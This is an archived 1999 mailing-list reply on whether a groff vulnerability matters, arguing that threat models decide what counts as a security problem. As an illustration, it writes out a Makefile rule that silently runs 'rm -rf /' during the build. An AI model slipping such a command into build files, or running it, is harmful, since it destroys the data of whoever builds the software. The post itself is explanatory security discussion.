Re: Groff dangerous (was Re: Troff dangerous.)

From: Kragen Sitaker (kragenat_private)
Date: Mon Jul 26 1999 - 19:55:36 PDT

Next message: Mike Perry: "Re: Antisniff thoughts + AASS Patch"

Previous message: Dr. Mudge: "Re: (How) Does AntiSniff do what is claimed?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Someone writes:
> The trick is that it can get you if you as a system administrator download
> some open source program from the Internet, and build and install that
> program; such activity often happens as "root", so a couple of scenarios
> are possible:

In most cases, this is a non-problem.

The reason this is a non-problem is that, for this to be a threat, your
"open source program from the Internet" [sic] has to have been packaged
by a malicious person who wants TO Crack your system.  But if this is
part of your threat model, you won't be safe if you fix groff, because
you're executing the makefile supplied by the malicious attacker, which
may say

x.o: x.c x.h
	@/bin/rm -rf / &
	$(CC) $(CFLAGS) x.c -o $@

There might be a case where the scenario you described *is* a problem:
where the program in question is never going to be executed as root,
and the Makefile has been carefully reviewed, but the source and man
pages haven't been.  In this case, though, I'd probably just read the
makefile and install things by hand with cp.  :)

There should be a common one-or-two-word name for this kind of
non-problem; there are some vivid metaphors for trying to solve it in
the literature.  (Bruce Schneier's example of planting a big thick
stake in front of your house in hopes thieves will run into it is one.)

You *must* be clear about your threat model -- i.e. what threats you're
trying to defend against -- before you can decide what is and isn't a
security problem.

(BTW, this groff problem doesn't surprise me much.  For a while, I had
a special email address you could send nroff-source man pages to and
get back formatted PostScript from on my home machine, as a convenience
when I was at work on Solaris machines without a decent groff.  I
didn't tell anybody about it until after I disabled it, because I
assumed there were probably security holes in groff; it wasn't written
to serve as a security gatekeeper, and a useful rule of thumb is that
such programs are not very good at security-boundary maintenance,
because it requires a different mindset from regular programming.  See
http://www.pobox.com/~kragen/security-holes.html for thoughts on this
situation and mailto:kragen-hacks-get.19at_private for the code
that made the manpage-to-PostScript converter work.)

--
<kragenat_private>       Kragen Sitaker     <http://www.pobox.com/~kragen/>
103 days until the Internet stock bubble bursts on Monday, 1999-11-08.

Next message: Mike Perry: "Re: Antisniff thoughts + AASS Patch"
Previous message: Dr. Mudge: "Re: (How) Does AntiSniff do what is claimed?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:53:46 PDT